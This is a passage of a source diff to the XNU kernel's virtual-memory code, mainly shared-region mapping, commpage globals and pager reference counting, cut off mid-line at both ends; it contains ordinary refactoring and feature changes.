VM_MAX_TAG_ZONES; zidx++) { - if (!zone[zidx].peak) { + if (!zone[zidx].vazt_peak) { continue; } info[nextinfo] = info[idx]; info[nextinfo].zone = (uint16_t)zone_index_from_tag_index(zidx, &elem_size); info[nextinfo].flags &= ~VM_KERN_SITE_WIRED; info[nextinfo].flags |= VM_KERN_SITE_ZONE; - info[nextinfo].size = zone[zidx].total; - info[nextinfo].peak = zone[zidx].peak; + info[nextinfo].size = zone[zidx].vazt_total; + info[nextinfo].peak = zone[zidx].vazt_peak; info[nextinfo].mapped = 0; - if (zone[zidx].wastediv) { - info[nextinfo].collectable_bytes = ((zone[zidx].waste * zone[zidx].total / elem_size) / zone[zidx].wastediv); - } nextinfo++; } } @@ -9490,9 +9480,7 @@ vm_page_diagnose_estimate(void) continue; } for (uint32_t zidx = 0; zidx < VM_MAX_TAG_ZONES; zidx++) { - if (zone[zidx].peak) { - count++; - } + count += (zone[zidx].vazt_peak != 0); } } #endif @@ -9522,7 +9510,7 @@ vm_page_diagnose_zone_stats(mach_memory_info_t *info, zone_stats_t zstats, static void vm_page_diagnose_zone(mach_memory_info_t *info, zone_t z) { - vm_page_diagnose_zone_stats(info, z->z_stats, z->percpu); + vm_page_diagnose_zone_stats(info, z->z_stats, z->z_percpu); snprintf(info->name, sizeof(info->name), "%s%s[raw]", zone_heap_name(z), z->z_name); } @@ -9562,13 +9550,13 @@ vm_page_diagnose(mach_memory_info_t * info, unsigned int num_info, uint64_t zone return KERN_ABORTED; } -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX wired_size = ptoa_64(vm_page_wire_count); wired_reserved_size = ptoa_64(vm_page_wire_count_initial - vm_page_stolen_count); -#else +#else /* !XNU_TARGET_OS_OSX */ wired_size = ptoa_64(vm_page_wire_count + vm_lopage_free_count + vm_page_throttled_count); wired_reserved_size = ptoa_64(vm_page_wire_count_initial - vm_page_stolen_count + vm_page_throttled_count); -#endif +#endif /* !XNU_TARGET_OS_OSX */ wired_managed_size = ptoa_64(vm_page_wire_count - vm_page_wire_count_initial); wired_size += booter_size; @@ -9643,7 +9631,7 @@ vm_page_diagnose(mach_memory_info_t * info, unsigned int num_info, uint64_t zone for (; zv; zv = zv->zv_next) { vm_page_diagnose_zone_stats(counts + i, zv->zv_stats, - z->percpu); + z->z_percpu); snprintf(counts[i].name, sizeof(counts[i].name), "%s%s[%s]", zone_heap_name(z), z->z_name, zv->zv_name); i++; @@ -9827,3 +9815,39 @@ stop_secluded_suppression(task_t task) } #endif /* CONFIG_SECLUDED_MEMORY */ + +/* + * Move the list of retired pages on the vm_page_queue_retired to + * their final resting place on retired_pages_object. + */ +void +vm_retire_boot_pages(void) +{ +#if defined(__arm64__) + vm_page_t p; + + vm_object_lock(retired_pages_object); + while (!vm_page_queue_empty(&vm_page_queue_retired)) { + vm_page_queue_remove_first(&vm_page_queue_retired, p, vmp_pageq); + assert(p != NULL); + vm_page_lock_queues(); + p->vmp_q_state = VM_PAGE_IS_WIRED; + p->vmp_wire_count++; + vm_page_unlock_queues(); + vm_page_insert_wired(p, retired_pages_object, ptoa(VM_PAGE_GET_PHYS_PAGE(p)), VM_KERN_MEMORY_RETIRED); + vm_object_unlock(retired_pages_object); + pmap_retire_page(VM_PAGE_GET_PHYS_PAGE(p)); + vm_object_lock(retired_pages_object); + } + vm_object_unlock(retired_pages_object); +#endif /* defined(__arm64__) */ +} + +/* + * Returns the current number of retired pages, used for sysctl. + */ +uint32_t +vm_retired_pages_count(void) +{ + return retired_pages_object->resident_page_count; +} diff --git a/osfmk/vm/vm_shared_region.c b/osfmk/vm/vm_shared_region.c index 115b24713..fb594cd86 100644 --- a/osfmk/vm/vm_shared_region.c +++ b/osfmk/vm/vm_shared_region.c @@ -143,16 +143,23 @@ int shared_region_persistence = 0; /* no by default */ /* delay in seconds before reclaiming an unused shared region */ TUNABLE_WRITEABLE(int, shared_region_destroy_delay, "vm_shared_region_destroy_delay", 120); -struct vm_shared_region *init_task_shared_region = NULL; +/* + * Cached pointer to the most recently mapped shared region from PID 1, which should + * be the most commonly mapped shared region in the system. There are many processes + * which do not use this, for a variety of reasons. + * + * The main consumer of this is stackshot. + */ +struct vm_shared_region *primary_system_shared_region = NULL; -#ifndef CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX /* * Only one cache gets to slide on Desktop, since we can't * tear down slide info properly today and the desktop actually * produces lots of shared caches. */ boolean_t shared_region_completed_slide = FALSE; -#endif +#endif /* XNU_TARGET_OS_OSX */ /* this lock protects all the shared region data structures */ static LCK_GRP_DECLARE(vm_shared_region_lck_grp, "vm shared region"); @@ -203,10 +210,10 @@ static kern_return_t vm_shared_region_slide_mapping( vm_prot_t prot); /* forward */ static int __commpage_setup = 0; -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX static int __system_power_source = 1; /* init to extrnal power source */ static void post_sys_powersource_internal(int i, int internal); -#endif +#endif /* XNU_TARGET_OS_OSX */ extern u_int32_t random(void); @@ -244,75 +251,6 @@ vm_shared_region_get( return shared_region; } -/* - * Get the base address of the shared region. - * That's the address at which it needs to be mapped in the process's address - * space. - * No need to lock since this data is set when the shared region is - * created and is never modified after that. The caller must hold an extra - * reference on the shared region to prevent it from being destroyed. - */ -mach_vm_offset_t -vm_shared_region_base_address( - vm_shared_region_t shared_region) -{ - SHARED_REGION_TRACE_DEBUG( - ("shared_region: -> base_address(%p)\n", - (void *)VM_KERNEL_ADDRPERM(shared_region))); - assert(shared_region->sr_ref_count > 1); - SHARED_REGION_TRACE_DEBUG( - ("shared_region: base_address(%p) <- 0x%llx\n", - (void *)VM_KERNEL_ADDRPERM(shared_region), - (long long)shared_region->sr_base_address)); - return shared_region->sr_base_address; -} - -/* - * Get the size of the shared region. - * That's the size that needs to be mapped in the process's address - * space. - * No need to lock since this data is set when the shared region is - * created and is never modified after that. The caller must hold an extra - * reference on the shared region to prevent it from being destroyed. - */ -mach_vm_size_t -vm_shared_region_size( - vm_shared_region_t shared_region) -{ - SHARED_REGION_TRACE_DEBUG( - ("shared_region: -> size(%p)\n", - (void *)VM_KERNEL_ADDRPERM(shared_region))); - assert(shared_region->sr_ref_count > 1); - SHARED_REGION_TRACE_DEBUG( - ("shared_region: size(%p) <- 0x%llx\n", - (void *)VM_KERNEL_ADDRPERM(shared_region), - (long long)shared_region->sr_size)); - return shared_region->sr_size; -} - -/* - * Get the memory entry of the shared region. - * That's the "memory object" that needs to be mapped in the process's address - * space. - * No need to lock since this data is set when the shared region is - * created and is never modified after that. The caller must hold an extra - * reference on the shared region to prevent it from being destroyed. - */ -ipc_port_t -vm_shared_region_mem_entry( - vm_shared_region_t shared_region) -{ - SHARED_REGION_TRACE_DEBUG( - ("shared_region: -> mem_entry(%p)\n", - (void *)VM_KERNEL_ADDRPERM(shared_region))); - assert(shared_region->sr_ref_count > 1); - SHARED_REGION_TRACE_DEBUG( - ("shared_region: mem_entry(%p) <- %p\n", - (void *)VM_KERNEL_ADDRPERM(shared_region), - (void *)VM_KERNEL_ADDRPERM(shared_region->sr_mem_entry))); - return shared_region->sr_mem_entry; -} - vm_map_t vm_shared_region_vm_map( vm_shared_region_t shared_region) @@ -324,7 +262,7 @@ vm_shared_region_vm_map( SHARED_REGION_TRACE_DEBUG( ("shared_region: -> vm_map(%p)\n", (void *)VM_KERNEL_ADDRPERM(shared_region))); - assert(shared_region->sr_ref_count > 1); + assert(shared_region->sr_ref_count > 0); sr_handle = shared_region->sr_mem_entry; sr_mem_entry = (vm_named_entry_t) ip_get_kobject(sr_handle); @@ -619,6 +557,11 @@ vm_shared_region_deallocate( } else { /* timer expired: let go of this shared region */ + /* Make sure there's no cached pointer to the region. */ + if (primary_system_shared_region == shared_region) { + primary_system_shared_region = NULL; + } + /* * Remove it from the queue first, so no one can find * it... @@ -977,11 +920,13 @@ vm_shared_region_destroy( /* * Gets the address of the first (in time) mapping in the shared region. + * If used during initial task setup by dyld, task should non-NULL. */ kern_return_t vm_shared_region_start_address( vm_shared_region_t shared_region, - mach_vm_offset_t *start_address) + mach_vm_offset_t *start_address, + task_t task) { kern_return_t kr; mach_vm_offset_t sr_base_address; @@ -990,7 +935,6 @@ vm_shared_region_start_address( SHARED_REGION_TRACE_DEBUG( ("shared_region: -> start_address(%p)\n", (void *)VM_KERNEL_ADDRPERM(shared_region))); - assert(shared_region->sr_ref_count > 1); vm_shared_region_lock(); @@ -1001,12 +945,11 @@ vm_shared_region_start_address( */ while (shared_region->sr_mapping_in_progress) { /* wait for our turn... */ - assert(shared_region->sr_ref_count > 1); vm_shared_region_sleep(&shared_region->sr_mapping_in_progress, THREAD_UNINT); } assert(!shared_region->sr_mapping_in_progress); - assert(shared_region->sr_ref_count > 1); + assert(shared_region->sr_ref_count > 0); sr_base_address = shared_region->sr_base_address; sr_first_mapping = shared_region->sr_first_mapping; @@ -1020,8 +963,23 @@ vm_shared_region_start_address( } + uint32_t slide = shared_region->sr_slide; + vm_shared_region_unlock(); + /* + * Cache shared region info in the task for telemetry gathering, if we're + * passed in the task. No task lock here as we're still in intial task set up. + */ + if (kr == KERN_SUCCESS && task != NULL && task->task_shared_region_slide == -1) { + uint_t sc_header_uuid_offset = offsetof(struct _dyld_cache_header, uuid); + if (copyin((user_addr_t)(*start_address + sc_header_uuid_offset), + (char *)&task->task_shared_region_uuid, + sizeof(task->task_shared_region_uuid)) == 0) { + task->task_shared_region_slide = slide; + } + } + SHARED_REGION_TRACE_DEBUG( ("shared_region: start_address(%p) <- 0x%llx\n", (void *)VM_KERNEL_ADDRPERM(shared_region), @@ -1105,7 +1063,7 @@ vm_shared_region_auth_remap(vm_shared_region_t sr) vm_shared_region_sleep(&sr->sr_mapping_in_progress, THREAD_UNINT); } assert(!sr->sr_mapping_in_progress); - assert(sr->sr_ref_count > 1); + assert(sr->sr_ref_count > 0); /* Just return if already done. */ if (task->shared_region_auth_remapped) { @@ -1157,8 +1115,7 @@ vm_shared_region_auth_remap(vm_shared_region_t sr) /* * Check that the object exactly covers the region to slide. */ - if (VME_OFFSET(tmp_entry) != si->si_start || - tmp_entry->vme_end - tmp_entry->vme_start != si->si_end - si->si_start) { + if (tmp_entry->vme_end - tmp_entry->vme_start != si->si_end - si->si_start) { kr = KERN_FAILURE; goto done; } @@ -1251,7 +1208,7 @@ vm_shared_region_undo_mappings( vm_named_entry_t sr_mem_entry; vm_shared_region_lock(); - assert(shared_region->sr_ref_count > 1); + assert(shared_region->sr_ref_count > 0); while (shared_region->sr_mapping_in_progress) { /* wait for our turn... */ @@ -1259,7 +1216,7 @@ vm_shared_region_undo_mappings( THREAD_UNINT); } assert(!shared_region->sr_mapping_in_progress); - assert(shared_region->sr_ref_count > 1); + assert(shared_region->sr_ref_count > 0); /* let others know we're working in this shared region */ shared_region->sr_mapping_in_progress = TRUE; @@ -1319,7 +1276,7 @@ vm_shared_region_undo_mappings( if (reset_shared_region_state) { vm_shared_region_lock(); - assert(shared_region->sr_ref_count > 1); + assert(shared_region->sr_ref_count > 0); assert(shared_region->sr_mapping_in_progress); /* we're done working on that shared region */ shared_region->sr_mapping_in_progress = FALSE; @@ -1332,10 +1289,11 @@ vm_shared_region_undo_mappings( } /* - * For now we only expect to see at most 2 regions to relocate/authenticate - * per file. One that's VM_PROT_SLIDE and one VM_PROT_SLIDE | VM_PROT_NOAUTH. + * For now we only expect to see at most 4 regions to relocate/authenticate + * per file. One that's RW VM_PROT_SLIDE and one VM_PROT_SLIDE | VM_PROT_NOAUTH. + * And then RO VM_PROT_SLIDE and one VM_PROT_SLIDE | VM_PROT_NOAUTH. */ -#define VMSR_NUM_SLIDES 2 +#define VMSR_NUM_SLIDES 4 /* * First part of vm_shared_region_map_file(). Split out to @@ -1379,7 +1337,7 @@ vm_shared_region_map_file_setup( unsigned int current_file_index = 0; vm_shared_region_lock(); - assert(shared_region->sr_ref_count > 1); + assert(shared_region->sr_ref_count > 0); /* * Make sure we handle only one mapping at a time in a given @@ -1392,7 +1350,7 @@ vm_shared_region_map_file_setup( THREAD_UNINT); } assert(!shared_region->sr_mapping_in_progress); - assert(shared_region->sr_ref_count > 1); + assert(shared_region->sr_ref_count > 0); /* let others know we're working in this shared region */ shared_region->sr_mapping_in_progress = TRUE; @@ -1726,7 +1684,10 @@ vm_shared_region_map_file( mach_vm_offset_t sfm_max_address = 0; vm_map_t sr_map = NULL; vm_map_offset_t lowest_unnestable_addr = 0; - mach_vm_offset_t file_first_mappings[VMSR_NUM_SLIDES] = {(mach_vm_offset_t) -1, (mach_vm_offset_t) -1}; + mach_vm_offset_t file_first_mappings[VMSR_NUM_SLIDES]; + for (i = 0; i < VMSR_NUM_SLIDES; ++i) { + file_first_mappings[i] = (mach_vm_offset_t) -1; + } kr = vm_shared_region_map_file_setup(shared_region, sr_file_mappings_count, sr_file_mappings, &mappings_to_slide_cnt, &mappings_to_slide[0], slid_mappings, slid_file_controls, @@ -1776,7 +1737,7 @@ vm_shared_region_map_file( } vm_shared_region_lock(); - assert(shared_region->sr_ref_count > 1); + assert(shared_region->sr_ref_count > 0); assert(shared_region->sr_mapping_in_progress); /* set "sr_first_mapping"; dyld uses it to validate the shared cache */ @@ -1806,6 +1767,13 @@ done: } #endif /* __has_feature(ptrauth_calls) */ + /* Cache shared region info needed for telemetry in the task */ + task_t task; + if (kr == KERN_SUCCESS && (task = current_task())->task_shared_region_slide == -1) { + mach_vm_offset_t start_address; + (void)vm_shared_region_start_address(shared_region, &start_address, task); + } + SHARED_REGION_TRACE_DEBUG( ("shared_region: map(%p) <- 0x%x \n", (void *)VM_KERNEL_ADDRPERM(shared_region), kr)); @@ -1829,6 +1797,7 @@ vm_shared_region_map_file_final( int error; size_t image_array_length; struct _dyld_cache_image_text_info *sr_image_layout; + boolean_t locally_built = FALSE; /* @@ -1844,6 +1813,7 @@ vm_shared_region_map_file_final( if (error == 0) { memcpy(&shared_region->sr_uuid, &sr_cache_header.uuid, sizeof(shared_region->sr_uuid)); shared_region->sr_uuid_copied = TRUE; + locally_built = sr_cache_header.locallyBuiltCache; } else { #if DEVELOPMENT || DEBUG panic("shared_region: copyin shared_cache_header(sr_base_addr:0x%016llx sr_first_mapping:0x%016llx " @@ -1858,19 +1828,27 @@ vm_shared_region_map_file_final( } /* - * If the shared cache is associated with the init task (and is therefore the system shared cache), - * check whether it is a custom built shared cache and copy in the shared cache layout accordingly. + * We save a pointer to the shared cache mapped by the "init task", i.e. launchd. This is used by + * the stackshot code to reduce output size in the common case that everything maps the same shared cache. + * One gotcha is that "userspace reboots" can occur which can cause a new shared region to be the primary + * region. In that case, launchd re-exec's itself, so we may go through this path multiple times. We + * let the most recent one win. + * + * Check whether the shared cache is a custom built one and copy in the shared cache layout accordingly. */ - boolean_t is_init_task = (task_pid(current_task()) == 1); + bool is_init_task = (task_pid(current_task()) == 1); if (shared_region->sr_uuid_copied && is_init_task) { /* Copy in the shared cache layout if we're running with a locally built shared cache */ - if (sr_cache_header.locallyBuiltCache) { + if (locally_built) { KDBG((MACHDBG_CODE(DBG_MACH_SHAREDREGION, PROCESS_SHARED_CACHE_LAYOUT)) | DBG_FUNC_START); image_array_length = (size_t)(sr_cache_header.imagesTextCount * sizeof(struct _dyld_cache_image_text_info)); sr_image_layout = kheap_alloc(KHEAP_DATA_BUFFERS, image_array_length, Z_WAITOK); error = copyin((user_addr_t)(shared_region->sr_base_address + shared_region->sr_first_mapping + sr_cache_header.imagesTextOffset), (char *)sr_image_layout, image_array_length); if (error == 0) { + if (sr_cache_header.imagesTextCount >= UINT32_MAX) { + panic("shared_region: sr_cache_header.imagesTextCount >= UINT32_MAX"); + } shared_region->sr_images = kalloc((vm_size_t)(sr_cache_header.imagesTextCount * sizeof(struct dyld_uuid_info_64))); for (size_t index = 0; index < sr_cache_header.imagesTextCount; index++) { memcpy((char *)&shared_region->sr_images[index].imageUUID, (char *)&sr_image_layout[index].uuid, @@ -1878,7 +1856,6 @@ vm_shared_region_map_file_final( shared_region->sr_images[index].imageLoadAddress = sr_image_layout[index].loadAddress; } - assert(sr_cache_header.imagesTextCount < UINT32_MAX); shared_region->sr_images_count = (uint32_t) sr_cache_header.imagesTextCount; } else { #if DEVELOPMENT || DEBUG @@ -1895,7 +1872,7 @@ vm_shared_region_map_file_final( kheap_free(KHEAP_DATA_BUFFERS, sr_image_layout, image_array_length); sr_image_layout = NULL; } - init_task_shared_region = shared_region; + primary_system_shared_region = shared_region; } /* @@ -2984,22 +2961,22 @@ vm_shared_region_slide_page( /* Comm page support */ /******************************************************************************/ -ipc_port_t commpage32_handle = IPC_PORT_NULL; -ipc_port_t commpage64_handle = IPC_PORT_NULL; -vm_named_entry_t commpage32_entry = NULL; -vm_named_entry_t commpage64_entry = NULL; -vm_map_t commpage32_map = VM_MAP_NULL; -vm_map_t commpage64_map = VM_MAP_NULL; +SECURITY_READ_ONLY_LATE(ipc_port_t) commpage32_handle = IPC_PORT_NULL; +SECURITY_READ_ONLY_LATE(ipc_port_t) commpage64_handle = IPC_PORT_NULL; +SECURITY_READ_ONLY_LATE(vm_named_entry_t) commpage32_entry = NULL; +SECURITY_READ_ONLY_LATE(vm_named_entry_t) commpage64_entry = NULL; +SECURITY_READ_ONLY_LATE(vm_map_t) commpage32_map = VM_MAP_NULL; +SECURITY_READ_ONLY_LATE(vm_map_t) commpage64_map = VM_MAP_NULL; -ipc_port_t commpage_text32_handle = IPC_PORT_NULL; -ipc_port_t commpage_text64_handle = IPC_PORT_NULL; -vm_named_entry_t commpage_text32_entry = NULL; -vm_named_entry_t commpage_text64_entry = NULL; -vm_map_t commpage_text32_map = VM_MAP_NULL; -vm_map_t commpage_text64_map = VM_MAP_NULL; +SECURITY_READ_ONLY_LATE(ipc_port_t) commpage_text32_handle = IPC_PORT_NULL; +SECURITY_READ_ONLY_LATE(ipc_port_t) commpage_text64_handle = IPC_PORT_NULL; +SECURITY_READ_ONLY_LATE(vm_named_entry_t) commpage_text32_entry = NULL; +SECURITY_READ_ONLY_LATE(vm_named_entry_t) commpage_text64_entry = NULL; +SECURITY_READ_ONLY_LATE(vm_map_t) commpage_text32_map = VM_MAP_NULL; +SECURITY_READ_ONLY_LATE(vm_map_t) commpage_text64_map = VM_MAP_NULL; -user32_addr_t commpage_text32_location = 0; -user64_addr_t commpage_text64_location = 0; +SECURITY_READ_ONLY_LATE(user32_addr_t) commpage_text32_location = 0; +SECURITY_READ_ONLY_LATE(user64_addr_t) commpage_text64_location = 0; #if defined(__i386__) || defined(__x86_64__) /* @@ -3098,11 +3075,11 @@ vm_commpage_init(void) /* populate them according to this specific platform */ commpage_populate(); __commpage_setup = 1; -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX if (__system_power_source == 0) { post_sys_powersource_internal(0, 1); } -#endif +#endif /* XNU_TARGET_OS_OSX */ SHARED_REGION_TRACE_DEBUG( ("commpage: init() <-\n")); @@ -3322,11 +3299,11 @@ vm_shared_region_slide( sr->sr_slide_in_progress = FALSE; thread_wakeup(&sr->sr_slide_in_progress); -#ifndef CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX if (error == KERN_SUCCESS) { shared_region_completed_slide = TRUE; } -#endif +#endif /* XNU_TARGET_OS_OSX */ vm_shared_region_unlock(); vm_shared_region_deallocate(sr); @@ -3449,19 +3426,19 @@ vm_shared_region_is_reslide(__unused struct task *task) * 1 if it is internal power source ie battery */ void -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX post_sys_powersource(int i) -#else +#else /* XNU_TARGET_OS_OSX */ post_sys_powersource(__unused int i) -#endif +#endif /* XNU_TARGET_OS_OSX */ { -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX post_sys_powersource_internal(i, 0); -#endif +#endif /* XNU_TARGET_OS_OSX */ } -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX static void post_sys_powersource_internal(int i, int internal) { @@ -3469,7 +3446,7 @@ post_sys_powersource_internal(int i, int internal) __system_power_source = i; } } -#endif +#endif /* XNU_TARGET_OS_OSX */ void * vm_shared_region_root_dir( diff --git a/osfmk/vm/vm_shared_region.h b/osfmk/vm/vm_shared_region.h index cc76069a0..bfe868241 100644 --- a/osfmk/vm/vm_shared_region.h +++ b/osfmk/vm/vm_shared_region.h @@ -58,7 +58,7 @@ extern int shared_region_debug; extern int shared_region_trace_level; -extern struct vm_shared_region *init_task_shared_region; +extern struct vm_shared_region *primary_system_shared_region; #define SHARED_REGION_TRACE_NONE_LVL 0 /* no trace */ #define SHARED_REGION_TRACE_ERROR_LVL 1 /* trace abnormal events */ @@ -276,12 +276,6 @@ extern vm_shared_region_t vm_shared_region_trim_and_get( struct task *task); extern void vm_shared_region_deallocate( struct vm_shared_region *shared_region); -extern mach_vm_offset_t vm_shared_region_base_address( - struct vm_shared_region *shared_region); -extern mach_vm_size_t vm_shared_region_size( - struct vm_shared_region *shared_region); -extern ipc_port_t vm_shared_region_mem_entry( - struct vm_shared_region *shared_region); extern vm_map_t vm_shared_region_vm_map( struct vm_shared_region *shared_region); extern void vm_shared_region_set( @@ -295,7 +289,8 @@ extern vm_shared_region_t vm_shared_region_lookup( boolean_t reslide); extern kern_return_t vm_shared_region_start_address( struct vm_shared_region *shared_region, - mach_vm_offset_t *start_address); + mach_vm_offset_t *start_address, + task_t task); extern void vm_shared_region_undo_mappings( vm_map_t sr_map, mach_vm_offset_t sr_base_address, diff --git a/osfmk/vm/vm_shared_region_pager.c b/osfmk/vm/vm_shared_region_pager.c index 3a1bb8fc9..3af00d602 100644 --- a/osfmk/vm/vm_shared_region_pager.c +++ b/osfmk/vm/vm_shared_region_pager.c @@ -291,11 +291,15 @@ done: * the "shared_region" EMM. */ typedef struct shared_region_pager { - struct memory_object srp_header; /* mandatory generic header */ + struct memory_object srp_header; /* mandatory generic header */ /* pager-specific data */ queue_chain_t srp_queue; /* next & prev pagers */ - uint32_t srp_ref_count; /* active uses */ +#if MEMORY_OBJECT_HAS_REFCOUNT +#define srp_ref_count srp_header.mo_ref +#else + os_ref_atomic_t srp_ref_count; /* active uses */ +#endif bool srp_is_mapped; /* has active mappings */ bool srp_is_ready; /* is this pager ready? */ vm_object_t srp_backing_object; /* VM object for shared cache */ @@ -520,7 +524,7 @@ shared_region_pager_data_request( pager = shared_region_pager_lookup(mem_obj); assert(pager->srp_is_ready); - assert(pager->srp_ref_count > 1); /* pager is alive */ + assert(os_ref_get_count_raw(&pager->srp_ref_count) > 1); /* pager is alive */ assert(pager->srp_is_mapped); /* pager is mapped */ PAGER_DEBUG(PAGER_PAGEIN, ("shared_region_pager_data_request: %p, %llx, %x, %x, pager %p\n", mem_obj, offset, length, protection_required, pager)); @@ -545,7 +549,7 @@ shared_region_pager_data_request( retval = kr; goto done; } - dst_object = mo_control->moc_object; + dst_object = memory_object_control_to_vm_object(mo_control); assert(dst_object != VM_OBJECT_NULL); /* @@ -842,8 +846,7 @@ shared_region_pager_reference( pager = shared_region_pager_lookup(mem_obj); lck_mtx_lock(&shared_region_pager_lock); - assert(pager->srp_ref_count > 0); - pager->srp_ref_count++; + os_ref_retain_locked_raw(&pager->srp_ref_count, NULL); lck_mtx_unlock(&shared_region_pager_lock); } @@ -890,7 +893,7 @@ shared_region_pager_terminate_internal( { assert(pager->srp_is_ready); assert(!pager->srp_is_mapped); - assert(pager->srp_ref_count == 1); + assert(os_ref_get_count_raw(&pager->srp_ref_count) == 1); if (pager->srp_backing_object != VM_OBJECT_NULL) { vm_object_deallocate(pager->srp_backing_object); @@ -914,6 +917,7 @@ shared_region_pager_deallocate_internal( { boolean_t needs_trimming; int count_unmapped; + os_ref_count_t ref_count; if (!locked) { lck_mtx_lock(&shared_region_pager_lock); @@ -924,10 +928,9 @@ shared_region_pager_deallocate_internal( needs_trimming = (count_unmapped > shared_region_pager_cache_limit); /* drop a reference on this pager */ - assert(pager->srp_ref_count > 0); - pager->srp_ref_count--; + ref_count = os_ref_release_locked_raw(&pager->srp_ref_count, NULL); - if (pager->srp_ref_count == 1) { + if (ref_count == 1) { /* * Only the "named" reference is left, which means that * no one is really holding on to this pager anymore. @@ -937,7 +940,7 @@ shared_region_pager_deallocate_internal( /* the pager is all ours: no need for the lock now */ lck_mtx_unlock(&shared_region_pager_lock); shared_region_pager_terminate_internal(pager); - } else if (pager->srp_ref_count == 0) { + } else if (ref_count == 0) { /* * Dropped the existence reference; the memory object has * been terminated. Do some final cleanup and release the @@ -1052,10 +1055,10 @@ shared_region_pager_map( lck_mtx_lock(&shared_region_pager_lock); assert(pager->srp_is_ready); - assert(pager->srp_ref_count > 0); /* pager is alive */ + assert(os_ref_get_count_raw(&pager->srp_ref_count) > 0); /* pager is alive */ if (!pager->srp_is_mapped) { pager->srp_is_mapped = TRUE; - pager->srp_ref_count++; + os_ref_retain_locked_raw(&pager->srp_ref_count, NULL); shared_region_pager_count_mapped++; } lck_mtx_unlock(&shared_region_pager_lock); @@ -1133,7 +1136,7 @@ shared_region_pager_lookup( assert(mem_obj->mo_pager_ops == &shared_region_pager_ops); pager = (shared_region_pager_t)(uintptr_t) mem_obj; - assert(pager->srp_ref_count > 0); + assert(os_ref_get_count_raw(&pager->srp_ref_count) > 0); return pager; } @@ -1173,8 +1176,8 @@ shared_region_pager_create( pager->srp_header.mo_control = MEMORY_OBJECT_CONTROL_NULL; pager->srp_is_ready = FALSE;/* not ready until it has a "name" */ - pager->srp_ref_count = 1; /* existence reference (for the cache) */ - pager->srp_ref_count++; /* for the caller */ + /* existence reference (for the cache) + 1 for the caller */ + os_ref_init_count_raw(&pager->srp_ref_count, NULL, 2); pager->srp_is_mapped = FALSE; pager->srp_backing_object = backing_object; pager->srp_backing_offset = backing_offset; @@ -1318,7 +1321,8 @@ shared_region_pager_match( if (memcmp(si->si_slide_info_entry, slide_info->si_slide_info_entry, si->si_slide_info_size) != 0) { continue; } - ++pager->srp_ref_count; /* the caller expects a reference on this */ + /* the caller expects a reference on this */ + os_ref_retain_locked_raw(&pager->srp_ref_count, NULL); lck_mtx_unlock(&shared_region_pager_lock); return (memory_object_t)pager; } @@ -1366,7 +1370,7 @@ shared_region_pager_trim(void) /* get prev elt before we dequeue */ prev_pager = (shared_region_pager_t)queue_prev(&pager->srp_queue); - if (pager->srp_ref_count == 2 && + if (os_ref_get_count_raw(&pager->srp_ref_count) == 2 && pager->srp_is_ready && !pager->srp_is_mapped) { /* this pager can be trimmed */ @@ -1401,13 +1405,13 @@ shared_region_pager_trim(void) srp_queue); pager->srp_queue.next = NULL; pager->srp_queue.prev = NULL; - assert(pager->srp_ref_count == 2); + assert(os_ref_get_count_raw(&pager->srp_ref_count) == 2); /* * We can't call deallocate_internal() because the pager * has already been dequeued, but we still need to remove * a reference. */ - pager->srp_ref_count--; + (void)os_ref_release_locked_raw(&pager->srp_ref_count, NULL); shared_region_pager_terminate_internal(pager); } } diff --git a/osfmk/vm/vm_swapfile_pager.c b/osfmk/vm/vm_swapfile_pager.c index 388d0fb56..677b2b0ce 100644 --- a/osfmk/vm/vm_swapfile_pager.c +++ b/osfmk/vm/vm_swapfile_pager.c @@ -137,13 +137,17 @@ const struct memory_object_pager_ops swapfile_pager_ops = { */ typedef struct swapfile_pager { /* mandatory generic header */ - struct memory_object swp_pgr_hdr; + struct memory_object swp_pgr_hdr; /* pager-specific data */ queue_chain_t pager_queue; /* next & prev pagers */ - unsigned int ref_count; /* reference count */ - boolean_t is_ready; /* is this pager ready ? */ - boolean_t is_mapped; /* is this pager mapped ? */ +#if MEMORY_OBJECT_HAS_REFCOUNT +#define swp_pgr_hdr_ref swp_pgr_hdr.mo_ref +#else + os_ref_atomic_t swp_pgr_hdr_ref; /* reference count */ +#endif + bool is_ready; /* is this pager ready ? */ + bool is_mapped; /* is this pager mapped ? */ struct vnode *swapfile_vnode;/* the swapfile's vnode */ } *swapfile_pager_t; #define SWAPFILE_PAGER_NULL ((swapfile_pager_t) NULL) @@ -320,7 +324,7 @@ swapfile_pager_data_request( pager = swapfile_pager_lookup(mem_obj); assert(pager->is_ready); - assert(pager->ref_count > 1); /* pager is alive and mapped */ + assert(os_ref_get_count_raw(&pager->swp_pgr_hdr_ref) > 1); /* pager is alive and mapped */ PAGER_DEBUG(PAGER_PAGEIN, ("swapfile_pager_data_request: %p, %llx, %x, %x, pager %p\n", mem_obj, offset, length, protection_required, pager)); @@ -344,7 +348,7 @@ swapfile_pager_data_request( retval = kr; goto done; } - dst_object = mo_control->moc_object; + dst_object = memory_object_control_to_vm_object(mo_control); assert(dst_object != VM_OBJECT_NULL); @@ -482,8 +486,7 @@ swapfile_pager_reference( pager = swapfile_pager_lookup(mem_obj); lck_mtx_lock(&swapfile_pager_lock); - assert(pager->ref_count > 0); - pager->ref_count++; + os_ref_retain_locked_raw(&pager->swp_pgr_hdr_ref, NULL); lck_mtx_unlock(&swapfile_pager_lock); } @@ -552,14 +555,16 @@ swapfile_pager_deallocate_internal( swapfile_pager_t pager, boolean_t locked) { + os_ref_count_t ref_count; + if (!locked) { lck_mtx_lock(&swapfile_pager_lock); } /* drop a reference on this pager */ - pager->ref_count--; + ref_count = os_ref_release_locked_raw(&pager->swp_pgr_hdr_ref, NULL); - if (pager->ref_count == 1) { + if (ref_count == 1) { /* * Only the "named" reference is left, which means that * no one is really holding on to this pager anymore. @@ -569,7 +574,7 @@ swapfile_pager_deallocate_internal( /* the pager is all ours: no need for the lock now */ lck_mtx_unlock(&swapfile_pager_lock); swapfile_pager_terminate_internal(pager); - } else if (pager->ref_count == 0) { + } else if (ref_count == 0) { /* * Dropped the existence reference; the memory object has * been terminated. Do some final cleanup and release the @@ -657,7 +662,7 @@ swapfile_pager_map( lck_mtx_lock(&swapfile_pager_lock); assert(pager->is_ready); - assert(pager->ref_count > 0); /* pager is 